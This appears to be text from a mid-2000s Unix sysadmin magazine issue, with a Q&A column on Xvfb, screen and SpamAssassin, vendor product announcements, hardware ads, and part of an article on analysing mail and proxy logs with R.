Q I have a headless E280R running Solaris 9 that's being put into 
production to generate some graphs using in-house software. 
Unfortunately, this software requires a graphics device, so I've run 
Xvfb to simulate the hardware so that the product works. This 
worked fine when we were doing a small number of operations, but 
now that the machine is seeing more use, the CPU is bogging down.
What’s the best way to work around this issue? Should I just add 
more CPU to the machine, install a graphics card, move the process 
off to another machine (very sub-optimal)? 

A There are a couple of things you could try to improve
performance. First, I'd try to get your in-house software team
to fix their software so that no graphics device is needed to
render the images in the first place. Barring that, you can try to
run additional Xvfb instances on different virtual displays if
you're rendering multiple images at the same time and you have
more than one CPU. This only works if the in-house application
can direct its individual renderings to different displays, of
course. If it can, you'll at least be utilizing both CPUs to do the
work instead of serially hitting one CPU. You can also put in a
graphics accelerator such as the XVR-500:

http://www.sun.com/desktop/products/graphics/xvr500/details.html
http://sunsolve.sun.com/handbook_pub/Devices/Graphics/ \
GRAPH_XVR_500.html

The approach that works best will depend on the type/size of images
being rendered and the capabilities of your in-house software,
though.
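
If the application can be pointed at a display per rendering job, spreading jobs across several Xvfb instances is a simple round-robin. The sketch below assumes the renderer honors the standard X11 DISPLAY environment variable and that Xvfb instances are already running on the listed displays; the display numbers and job names are hypothetical.

```python
from itertools import cycle


def assign_displays(jobs, displays):
    """Pair each render job with a virtual display, round-robin."""
    if not displays:
        raise ValueError("at least one display is required")
    return list(zip(jobs, cycle(displays)))


def job_environment(display, base_env):
    """Copy an environment and point DISPLAY at the chosen Xvfb instance."""
    env = dict(base_env)
    env["DISPLAY"] = display
    return env


# Hypothetical displays, one Xvfb instance per CPU.
plan = assign_displays(["graph-a", "graph-b", "graph-c"], [":1", ":2"])
for job, display in plan:
    print(job, "->", job_environment(display, {})["DISPLAY"])
```

Each environment would then be handed to whatever launches the renderer, for example through the env argument of subprocess.Popen.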

Q We're using screen to connect to a terminal server and log
console output for a number of machines. We run screen in
detached mode because we're mostly just interested in the log
files. Occasionally, we need to kill off one of the screen windows
since the console for a given machine hangs and needs manual
intervention. We don't really want to have to reattach to the
screen session to do this, but it appears that that's the only way to
accomplish what we're after since screen -X will only send
commands to the current attached window. Is there some sort of
macro or wrapper we can write to tell screen it should act on a
window of our choosing?


A Screen actually has a built-in mechanism that will handle
this for you. If your screen session is detached, specify the
-p flag in conjunction with the -X flag to tell screen that you
wish to pre-select the specified window. From the man page
(spelling errors corrected):

-p number_or_name Pre-select a window. This is useful when you
want to reattach to a specific window or you want to send a
command via the "-X" option to a specific window. As with screen's
select command, "-" selects the blank window. As a special case for
reattach, "=" brings up the window list on the blank window.

-X Send the specified command to a running screen session. You can
use the -d or -r option to tell screen to look only for attached or
detached screen sessions. Note that this command doesn't work if
the session is password protected.

So, to kill window 6 of your detached session on 848.pts-4.hostname
without actually doing a reattach:

screen -r 848.pts-4.hostname -p 6 -X kill
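
If hung consoles turn up regularly, the same command line can be assembled by a small wrapper so that a monitoring script can act on any window. This is only a sketch that mirrors the flags shown above; the helper name is made up for illustration, and nothing is executed until the argument list is passed to something like subprocess.run.

```python
def screen_window_command(session, window, *command):
    """Build the argv that sends a screen command to one window of a session."""
    if not command:
        raise ValueError("a screen command such as 'kill' is required")
    return ["screen", "-r", session, "-p", str(window), "-X", *command]


# Same invocation as the example above, built programmatically.
argv = screen_window_command("848.pts-4.hostname", 6, "kill")
print(" ".join(argv))

# To run it for real (not done here):
#   import subprocess
#   subprocess.run(argv, check=True)
```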

Q I'm running SpamAssassin to try and catch the majority of
spam that hits my inbox. Sometimes a piece of spam
manages to pass through SA without getting flagged. I've also tried
forwarding this spam to another system and it passes there, too. If
I run SA on it by hand, though, it's very evidently tagged as
spam. How come SA is missing some of the spam when it's
filtering automatically?

A Without the specific piece of spam and more knowledge of
your SA setup, it's difficult to diagnose. A potential issue
might be the size of the message, though. If you're using the
example procmail recipe, as shown below, SA only processes messages
up to 256K.

:0fw: spamassassin.lock
* < 256000
| spamassassin

Also, spamc has a default maximum size of 250K, which can be
increased by using the -s flag. From the spamc man page:

-s max_size Set the maximum message size which will be sent to
spamd - any bigger than this threshold and the message will be
returned unprocessed (default: 250k). If spamc gets handed a
message bigger than this, it won't be passed to spamd.

The size is specified in bytes, and if you send it a negative number,
things are quite likely to break very hard.

If you're using a milter in conjunction with sendmail, look for
message size limits there as well.
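
A quick way to check whether size explains a missed message is to compare its byte count against both limits. The sketch below takes the 256000-byte threshold from the recipe above and assumes the spamc default of "250k" means 250 * 1024 bytes; verify that figure against your spamc version, or pass the value you set with -s.

```python
PROCMAIL_LIMIT = 256000           # from "* < 256000" in the recipe above
SPAMC_DEFAULT_LIMIT = 250 * 1024  # assumption: "250k" read as 250 * 1024 bytes


def skipped_by(size, spamc_limit=SPAMC_DEFAULT_LIMIT):
    """List the size checks that would let a message bypass scanning."""
    reasons = []
    if not size < PROCMAIL_LIMIT:  # the recipe only fires when size < limit
        reasons.append("procmail recipe")
    if size > spamc_limit:         # spamc returns bigger messages unprocessed
        reasons.append("spamc -s limit")
    return reasons


for size in (1000, 256000, 300000):
    print(size, skipped_by(size) or "scanned")
```

The size to test is the length in bytes of the raw message as delivered, headers included.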

Amy Rich, president of the Boston-based Oceanwave Consulting, Inc.
(http://www.oceanwave.com), has been a UNIX systems administrator for
more than 10 years. She received a BSCS at Worcester Polytechnic Institute,
and can be reached at: qna@oceanwave.com.
Linux Netwosix 1.2 Released

According to the company, Linux Netwosix is a distribution for
servers and network-security related jobs. It can also be used for
special operations, such as penetration testing, with its collection of
security-oriented software and sources. It's a light distribution
created to be portable and highly configurable. Linux Netwosix also
has a ports system (Nepote) similar to the xBSD systems but more
flexible. For more information, visit: http://www.netwosix.org.

Pointsec for Linux Announced 

Pointsec announced that it is broadening its endpoint security
solutions to encompass Linux. According to the company, Pointsec
for Linux enables users to protect their confidential data stored on
laptops and desktop computers running Linux. Pointsec's data
encryption solutions enable secure deployment of mobile devices.
Pointsec can provide automatic encryption and decryption that is
transparent to users and does not impede performance or
productivity. Pointsec supports major operating systems for PCs, PDAs,
and smart phones and secures information stored on the mobile
devices and on removable memory media with full-disk
encryption. Pointsec for Linux will be available in early 2005. For more
information, visit: http://www.pointsec.com.

Constant Data Supports 2.4 and 2.6 
Linux Distributions 

Constant Data announced improved Linux support for its
Constant Replicator real-time data replication software solution.
According to the company, Constant Replicator for Linux release
4.0 extends Linux coverage by providing support for all 2.4 and 2.6
kernel-based Linux distributions. Examples of supported Linux
operating systems include Red Hat Enterprise Linux AS and ES,
Debian 3.0, and Novell/SUSE Linux Enterprise Server 8 and 9. For
more information, visit: http://www.constantdata.com.

Cluster Resources Introduces 
Moab Cluster Suite 

Cluster Resources, Inc. announced the release of Moab
Cluster Suite 4.2 for Mac OS X. According to the company, it is
the first release of Cluster Resources' cluster management suite to
support the Mac OS X platform and includes: Moab Workload
Manager, a policy-based workload management and scheduling
engine; Moab Cluster Manager, a graphical cluster administration
interface, monitor, and reporting tool; and Moab Access Portal,
an end-user job submission and management portal. Moab
Cluster Suite 4.2 also supports Linux and Unix-based server
platforms and Mac OS X, Linux, Unix, and Windows clients. For
more information, visit: http://www.clusterresources.com.


BGSoft Announces Network Searcher 3.6 

BGSoft announced version 3.6 of its file searching utility.
According to the company, Network Searcher 3.6 allows for file
searches on local networks (LAN) and customized results
reporting, as well as multimedia file recognition for files displayed in
search results. Network Searcher utilizes multiple searching
processes running simultaneously (threads) to enable network users
to search for various types of files and data contained in files based
on an extensive set of criteria. For more information, visit:
http://www.bgsoft.net.

Wise Solutions Unveils Wise Package 
Studio 5.5 

Wise Solutions (a wholly-owned subsidiary of Altiris, Inc.)
released Wise Package Studio 5.5. According to the company, Wise
Package Studio 5.5 gives systems administrators the ability to
quickly assess and test critical software patches prior to
deployment. For more information, visit: http://www.wise.com/wps.asp.

Barracuda Announces Spam Firewall 800 

Barracuda Networks, Inc. announced the Barracuda Spam 
Firewall 800, the first carrier-class spam appliance available for 
large organizations and Internet Service Providers (ISPs). 
According to the company, the Barracuda Spam Firewall 800 offers 
the fastest throughput available for an email gateway appliance and 
is capable of handling spam at a rate of nearly 1.3 million messages 
per hour. 

The Barracuda Spam Firewall 800, which supports 30,000 active
users, is designed for large enterprises. The Barracuda Spam
Firewall 800 includes several advanced capabilities including
redundant hot swap power supplies, RAID 5 disk storage, and dual gigabit
Ethernet ports, in addition to the features offered with Barracuda
Spam Firewall 600. Multiple Barracuda Spam Firewall 800 units
can be clustered for greater redundancy and higher capacity.

The Barracuda Spam Firewall 800 is currently available and
priced at $17,999 for the appliance and $3,999 per year for
subscription to the Energize Update service. For more information,
visit: http://www.barracudanetworks.com.


Appro Unveils AMD Opteron-Powered
XtremeBlade Solution

Appro recently unveiled its new XtremeBlade solution, which
begins shipping in early 2005. According to the company, the
Appro XtremeBlade is the next generation blade solution offering
Infiniband interfaces to all external data and storage networks.
This solution provides added efficiency to large-scale
deployments while adding processor flexibility and scalability. It is
also designed for high-availability by offering hot-swappable
blades, redundant power supplies and cooling fans, as well as
integration of key components such as network switches and
centralized management.

The Appro XtremeBlade solution features six sub-racks housing
up to 12 blade servers in each sub-rack. An XtremeBlade Cluster
can support up to 72 blade servers in a single rack cabinet solution.
This solution mixes blade configurations from 2-way, 4-way, and/or
8-way in the same sub-rack clustering infrastructure. Appro
XtremeBlade solution also offers a variety of configuration options
including Appro DAS/NAS/SAN based storage solutions and a
choice of Windows and Linux operating systems. For more
information, visit: http://www.appro.com.


NextCom Announces the FlexPCServer 
Series 

NextCom LLC announced its briefcase notebook and mobile
server with Single or Dual Xeon to 3.06GHz (Enterprise Linux
and Windows AS). According to the company, the FlexPCServer
provides extreme performance computing in a portable form and
is a complete server and high performance graphics workstation
providing maximum flexibility with up to three internal media
bays, flexible external storage options via 160MB/sec SCSI,
Fiber Channel, serial ATA and USB 2.0, including high-capacity
drives to 500GB. It can also help you leverage the low cost of the
USB 2.0 peripheral market, while sharing files with other Sun
workstations, Linux desktop, Solaris 9 x86, enterprise operating
systems, Enterprise Linux, Microsoft Windows XP Pro, 2000 Pro,
and Windows Server 2003.

For more information, visit: http://www.nextcomputing.com.

Logical Solutions Introduces Global-Link 

Logical Solutions announced Global-Link, a new product 
for the secure transmission of high-resolution video, keyboard, 
and mouse using TCP/IP. According to the company, Global- 
Link represents the culmination of a collaboration between 
Logical Solutions and scientists at Sandia National Laboratory 
under the Department of Energy National Nuclear Security 
Administration’s Advanced Simulation and Computing 
Program (ASC). 

Global-Link does not require client/server software, licensing, or
non-secure browsers. The Global-Link system consists of an
encoder connected to the source computer and a local KVM console,
and a decoder that connects to a remote keyboard, mouse, and
video display device. The keyboard and mouse at each end may be
PS2, USB, or legacy Sun. Video sources may be either DVI (digital)
or RGB (analog). The decoder can output either DVI or RGB
video, allowing the use of digital flat panel or analog monitors.
Patented differencing algorithms are used to send only frame-to-frame
pixel changes in the video. The Global-Link is not operating
system dependent and will work with Windows, Linux, Unix, and
USB-based Apple Computer environments. Global-Link has
10/100 Base-T and 1,000 Base-T copper network connections and
a GBIC slot for fiber optic 1,000 Base-T. For more information,
visit: http://www.thinklogical.com.


Trigence Announces Solaris Support 

Trigence Corp. announced Trigence AE 2.2 with support for
Solaris. According to the company, Trigence AE 2.2 (available in
early 2005) is an application virtualization solution that uses a
container approach to help data centers achieve high availability
and flexible application lifecycle management. Sun Solaris customers
using Sun’s N1 container approach can add Trigence AE
above N1 to provide portability, easy provisioning, and on-demand
delivery with Sun’s Solaris 10 containers. Customers
who intend to remain on Solaris 9 can utilize containerization
with Trigence AE while at the same time building a migration
route to Solaris 10 when they are ready. Trigence AE will be
jointly marketed by Sun and Trigence Corp. For more information,
visit: http://www.trigence.com.

Vintela Updates Open-source 
Development Tools 

Vintela announced availability of enhanced versions of
OpenSSH and PuTTY for Vintela Authentication Services
(VAS). According to the company, both open source projects,
which are designed to help Vintela customers create a true single
sign-on solution using Active Directory and VAS, are available
from Vintela’s Resource Central online solution community
(http://www.rc.vintela.com).

Combined, OpenSSH for VAS and PuTTY for VAS allow
users to establish sessions from Windows to Unix, or from Unix
to Unix, using the OpenSSH Remote Secure Shell (SSH). Resource
Central provides binary packaging for OpenSSH on Linux, Solaris,
HP-UX, and AIX platforms. For more information, visit:
http://www.vintela.com.


SSH Tectia Supports New Platforms 

SSH Communications Security announced that it has added
support for Red Hat Enterprise Linux V2.1 and V3.0, Solaris 9,
Windows 2000, and Windows 2003 Server to its FIPS 140-2 certified
encryption module used in its SSH Tectia client/server solution.
According to the company, these added platforms make SSH
Tectia the leading heterogeneous FIPS supported Secure Shell
solution. For more information, visit: http://www.ssh.com.


Digi Introduces Digi One IAP 

Digi International introduced an enhanced Digi One IAP 
industrial device server. According to the company, this new 
release is the industry’s first truly interoperable device server 
featuring industrial protocol bridging. Protocol bridging enables
industrial Ethernet and serial protocols to transparently intercommunicate.
MODBUS, Allen Bradley, and ASCII devices
such as Programmable Logic Controllers (PLCs), drives, bar
code readers, scales, and RFID devices can now be integrated.
The enhanced Digi One IAP also features 64 socket connections.
For more information, visit: http://www.digi.com.

Opteron™, Xeon™ EM64T, and Itanium®2



Innovative Technology and Services at Competitive Prices 


* NEW! Microway Quadputer®-Navion™ enterprise- 
class server incorporates 4 Opteron 850 processors in 
4U chassis with hot-swap, redundant power supplies 
and hard drives. For other 64-bit solutions, go to 
www.microway.com. 


Expert Integration *** 

Microway offers innovative, competitively priced, custom designed clusters
with NodeWatch™ management and monitoring tools. Our solutions incorporate
the latest processors, proprietary cooling and storage solutions, plus
high-speed Myrinet and InfiniBand interconnects for demanding applications.


* NodeWatch™/MCMS™ provides remote control
and monitoring of vital cluster parameters and failsafe
shutdown. NodeWatch monitors temperatures, voltages,
and chassis fans, runs off the master node, and is
controlled by a secure web-based GUI. Available only
on Microway HPC solutions.

• Fully redundant, highly-available storage systems
based on fiber channel technology for multi-terabyte
storage requirements. State-of-the-art storage directors
for full access from any cluster node. Easily scales
to address rapidly expanding storage requirements.


Superior Service and Tech Support ... 

We understand that on-time delivery, out-of-the-box reliability and excellent
ongoing technical support are critical to our users. Microway offers professional
services from specialists with a wide range of expertise in HPC applications.
On-site installations and training are also available.

Satisfied Customers ... 

AT&T, Cessna, GE, GSK, Johnson & Johnson, LANL, LLNL, MBL, 
Millennium Pharmaceuticals, NIH, Northrop Grumman, Raytheon, Sandia, 
Seagate, US Air Force, Army, Navy, NASA, NOAA and hundreds of leading
universities are among our satisfied customers since 1982.



Call us first at 508-746-7341 for 
quotations and benchmarking services. 
Find technical information, testimonials , and 
online newsletter at www.microway.com. 


“ The Brain Imaging Research Center (a joint center of Carnegie 
Mellon University and University of Pittsburgh) decided to 
purchase our Linux cluster from Microway because of the 
proven performance of their clusters at Carnegie 
Mellon in the processing of high-volume brain 
imaging data. Microway was flexible and helpful 
at all stages, starting from the initial custom 
configuration and ending with timely delivery 
and full installation.” 

- Marcel Just, Co-Director, 
Brain Imaging Research Center 


Quadputer®-Navion™

with four AMD Opteron 850s
plus hot-swap, redundant
power supplies and hard drives.


Microway CoolRak™ Cabinet 

with dual Opteron or Xeon 
1U nodes, Myrinet connectivity 
and four 10" 535 CFM rear fans.

A Mail Server Application

Log files from a Postfix mail server are
used in this simple application.
The data of interest in the log files includes
the top-level DNS domain (.gr, .com, etc.) of
the outgoing mail address, the delay duration
(in seconds), and the time of day (in
HH:MM:SS format). To extract
the data, grep, sed, and awk were used.
(Perl or another scripting language could have
been used instead.) The first 10 lines of the
data, including the column titles, are shown
in Table 2.
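
The extraction itself was done with grep, sed, and awk, and those commands are not reproduced here. As an alternative, the same three columns can be pulled out inside R. The following is only a sketch: the log lines are made up, the layout (syslog timestamp, to=<address>, delay=seconds) is an assumption about a typical Postfix delivery line, and the name MAILDATA is borrowed from the summary() call used later.

```r
# Hypothetical Postfix delivery lines; real logs differ between versions and setups.
log_lines <- c(
  "Jan 10 11:07:12 mail postfix/smtp[2101]: 3F2A1: to=<alice@example.gr>, relay=mx.example.gr[192.0.2.1], delay=3, status=sent (250 OK)",
  "Jan 10 11:09:40 mail postfix/smtp[2105]: 7C9B2: to=<bob@example.com>, relay=mx.example.com[192.0.2.2], delay=12, status=sent (250 OK)",
  "Jan 10 11:10:02 mail postfix/qmgr[311]: 7C9B2: removed"
)

# Keep only the lines that carry both a recipient and a delay.
sent <- grep("to=<[^>]+>.*delay=", log_lines, value = TRUE)

MAILDATA <- data.frame(
  # Third whitespace-separated field of the syslog prefix is HH:MM:SS.
  Time   = sub("^\\S+\\s+\\S+\\s+(\\d{2}:\\d{2}:\\d{2}).*$", "\\1", sent, perl = TRUE),
  # Last dot-separated label of the recipient address (gr, com, ...).
  Domain = sub("^.*to=<[^>]*\\.([A-Za-z]+)>.*$", "\\1", sent),
  # Delay in seconds.
  Delay  = as.numeric(sub("^.*delay=([0-9.]+).*$", "\\1", sent)),
  stringsAsFactors = TRUE
)

print(MAILDATA)
```

Storing Time and Domain as factors is a deliberate choice here, because summary() then reports counts per value for those two columns.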

Extracting Information 

What information can we get from the
data using R? Summary information (using the
summary() command) can be extracted,
which in this particular case gives:

> summary(MAILDATA)
       Time       Domain
 11:07:12:  5   au :  3
 08:51:05:  3   com: 10
 13:23:47:  3   edu:  2
 06:12:53:  2   gr :117
 16:42:34:  2   org: 11
 00:52:50:  1   uk :  2
 (Other) :129
>

This tells us that most of our emails go to
the .GR domain and that the busiest
moment (relatively busy because those log
files were from my home dial-up server) is
11:07:12. Instead of Time, you can use
Day, Week, Month, or even Year variables
for getting mail information. The fact that
the 3rd Qu. value is very close to the
Median means that there are no major
delays in sending the outgoing messages,
at least for 75% of the
items in the data set. If you want more
precise information, you can divide the
data set into smaller data sets.
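
Dividing the data set can be done in more than one way. The sketch below uses a small made-up data frame with the same three columns (Time, Domain, Delay); the values and the GR and delay_by_domain names are illustrative only.

```r
# Hypothetical sample in the same shape as the mail data.
MAILDATA <- data.frame(
  Time   = c("11:07:12", "08:51:05", "13:23:47", "06:12:53", "16:42:34"),
  Domain = factor(c("gr", "com", "gr", "org", "gr")),
  Delay  = c(1, 217, 3, 6, 2)
)

# One smaller data set: only the messages sent to .gr addresses.
GR <- subset(MAILDATA, Domain == "gr")
print(summary(GR$Delay))

# Or look at every domain at once: median delay per domain.
delay_by_domain <- tapply(MAILDATA$Delay, MAILDATA$Domain, median)
print(delay_by_domain)
```

subset() is convenient when one group is of interest, while tapply() gives a quick comparison across all groups.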

Output Explanation 

The Time and Domain data are not
numbers, so R counts the occurrences of each
distinct value (treating each value as a
string) and prints the most frequent ones. As far
as Delay (which is numeric) is concerned,
R calculates and displays the following six
values:

• Min. — This is the minimum value of the 
data set. 

• Median — This is an element that divides 
the data set into two subsets (left and 
right subsets) with the same number of 
elements. If the data set has an odd number
of elements, then the Median is part

     Delay
 Min.   :  1.00
 1st Qu.:  2.00
 Median :  3.00
 Mean   : 11.38
 3rd Qu.:  6.00
 Max.   :217.00
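
The six values that summary() prints for a numeric column can also be computed one at a time, which makes it clearer what each one means. This is a sketch on a made-up delay vector, not on the article's data; the variable names are illustrative, and quantile() is used with its default method.

```r
# Hypothetical delays in seconds; one large outlier pulls the mean up.
delay <- c(1, 2, 2, 3, 3, 6, 217)

six <- c(
  "Min."    = min(delay),
  "1st Qu." = unname(quantile(delay, 0.25)),  # a quarter of the values lie at or below this
  "Median"  = median(delay),                  # middle element of the sorted data
  "Mean"    = mean(delay),                    # arithmetic average
  "3rd Qu." = unname(quantile(delay, 0.75)),  # three quarters lie at or below this
  "Max."    = max(delay)
)
print(six)
```

As in the mail data, a single very slow delivery moves the Mean far above the Median, which is why the Median and the quartiles are the better guide to typical behavior.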
> summary(CALAMARIS)
     domain   number.of.requests percent.of.total.requests  Total.Bytes
 *.Cfl  :1    Min.   :   3.0     Min.   : 0.09              Min.   :   7919
 *.com  :1    1st Qu.:  32.0     1st Qu.: 0.94              1st Qu.: 114303
 *.de   :1    Median : 127.0     Median : 3.75              Median : 450469
 *.edu  :1    Mean   : 376.8     Mean   :11.11              Mean   :1656217
 *.gr   :1    3rd Qu.: 187.0     3rd Qu.: 5.51              3rd Qu.:1249501
 *.net  :1    Max.   :1403.0     Max.   :41.37              Max.   :7649799
 (Other):3
>

There is also a very handy way for representing a data set graphically.
Figure 1 shows the output of the pairs() command. Again,
the CALAMARIS data set is used. What you see in Figure 1 is the
graphical representation of all the subsets of the CALAMARIS data
set in pairs.
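
To try pairs() without the original proxy logs, a small stand-in data frame is enough. In the sketch below the column names follow the summary output, but the rows are invented and the plot goes to a temporary PDF file (plot_file is a hypothetical name), so it also runs on a machine without a display.

```r
# Invented rows; only the column names mirror the CALAMARIS summary.
CALAMARIS <- data.frame(
  number.of.requests        = c(3, 32, 127, 187, 1403),
  percent.of.total.requests = c(0.09, 0.94, 3.75, 5.51, 41.37),
  Total.Bytes               = c(7919, 114303, 450469, 1249501, 7649799)
)

plot_file <- tempfile(fileext = ".pdf")
pdf(plot_file)        # send graphics to a file instead of the screen
pairs(CALAMARIS)      # one scatter plot for every pair of columns
dev.off()             # close the file so it is written out
```

In an interactive session, the pdf() and dev.off() calls can be dropped and pairs(CALAMARIS) opens a plot window directly.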

R supports the following types of objects: 

• Vectors (the most important objects in R) 

• Matrices (arrays) 

• Factors 

• Lists 

• Data frames 

• Functions 

For more information about those objects, refer to the documentation
that comes with your R installation.
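
As a quick orientation, each of the object types listed above can be created in one line. The values and variable names in this sketch are arbitrary examples.

```r
v <- c(3, 9, 27)                           # vector of numbers
m <- matrix(1:6, nrow = 2)                 # matrix with 2 rows and 3 columns
f <- factor(c("gr", "com", "gr"))          # factor: categories with levels com, gr
l <- list(host = "Pluto", cpus = 4)        # list: elements may have different types
d <- data.frame(Name    = c("Pluto", "Plato"),
                Version = c("8", "Stable"))  # data frame: a table of equal-length columns
cube <- function(x) x^3                    # function

# Ask R what each object is.
kinds <- sapply(list(v, m, f, l, d, cube), function(x) class(x)[1])
print(kinds)
```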


The merge() command can be very useful because it works similarly
to database joins, which means that related tables of data can
be combined into one table. The following is a complete example of
two tables being merged:

> SERVER
     Name           OS  Version
1   Pluto      Solaris        8
2   Plato Linux_Debian   Stable
3  Racoon          AIX       5L
4     Pik Linux_Debian Unstable
5 Eugenia  Solaris_x86        9
> ADMIN
  Machine Admin_Name Admin_Surname
1   Pluto        Tom       Philips
2 Eugenia       Anna         Tomas
3   Plato        Jim  Papadopoulos
4  Racoon      Peter         McRay
5     Pik       John         Papas
> merge(SERVER, ADMIN, by.x="Name", by.y="Machine")
     Name           OS  Version Admin_Name Admin_Surname
1 Eugenia  Solaris_x86        9       Anna         Tomas
2     Pik Linux_Debian Unstable       John         Papas
3   Plato Linux_Debian   Stable        Jim  Papadopoulos
4   Pluto      Solaris        8        Tom       Philips
5  Racoon          AIX       5L      Peter         McRay
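
The database analogy goes a little further than the example shows: by default merge() behaves like an inner join and silently drops rows that have no partner in the other table, while all = TRUE keeps them and fills the gaps with NA. The sketch below uses a cut-down version of the two tables; the host "Titan" and the admin "Maria" are made up to create unmatched rows.

```r
SERVER <- data.frame(
  Name    = c("Pluto", "Plato", "Racoon"),
  OS      = c("Solaris", "Linux_Debian", "AIX"),
  Version = c("8", "Stable", "5L")
)
ADMIN <- data.frame(
  Machine    = c("Pluto", "Plato", "Titan"),   # "Titan" is hypothetical: no SERVER row
  Admin_Name = c("Tom", "Jim", "Maria")
)

# Inner join: only machines present in both tables survive.
inner <- merge(SERVER, ADMIN, by.x = "Name", by.y = "Machine")
print(inner)

# Full outer join: every machine from either table, NA where data is missing.
outer <- merge(SERVER, ADMIN, by.x = "Name", by.y = "Machine", all = TRUE)
print(outer)
```

Comparing the row counts of the two results is a cheap way to notice machines that are missing from one of the inventories.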


> 


Advanced Commands of 
the R System 

The save() command is used for dumping
an object to disk in order to use it later:

> save(SYSADMIN, file = \
"/Users/mtsouk/SYSAMIN.r")

To read data from a file, use the load()
command:

> rm(SYSADMIN)

> SYSADMIN

Error: Object "SYSADMIN" not found

> load( file = "/Users/mtsouk/SYSAMIN.r" )

> SYSADMIN

   0    1    2    3    4    5    6    7
   1    3    9   27   81  243  729 2187
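
The same round trip can be tried without touching a real directory by writing to a temporary file. In this sketch SYSADMIN is rebuilt as a named vector of powers of three, which is only a guess at how the original object was created, and path is a hypothetical variable name.

```r
# Assumed reconstruction of the object: 3^0 .. 3^7, labelled 0..7.
SYSADMIN <- 3^(0:7)
names(SYSADMIN) <- 0:7

path <- tempfile(fileext = ".RData")   # throwaway file instead of a fixed path
save(SYSADMIN, file = path)

rm(SYSADMIN)                           # the object is gone from the session now

restored <- load(path)                 # load() returns the names it brought back
print(restored)
print(SYSADMIN)
```

Note that load() restores objects under their original names, so it can overwrite an object of the same name that already exists in the session.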

> 

With the edit() command, the editor presents
the data set ready for editing. I think
this is very practical. The R package can
also import data from various formats and
database systems, including PostgreSQL
and database sources supporting the ODBC
interface. R can also communicate via BSD
sockets. For more information, refer to:

http://developer.r-project.org/db

UNIX and Linux
Performance Tuning 
Simplified! 


Understand 
Exactly What’s 
Happening 

SarCheck translates
pages of sar and ps
output into a plain
English or HTML
report, complete with
recommendations.


Maintain 
Full Control 

SarCheck fully
explains each of its
recommendations,
providing the
information needed
to take intelligent
informed actions.


Plan for 
Future Growth 

SarCheck’s Capacity 
Planning feature helps 
you to plan for growth, 
before slowdowns or
problems occur.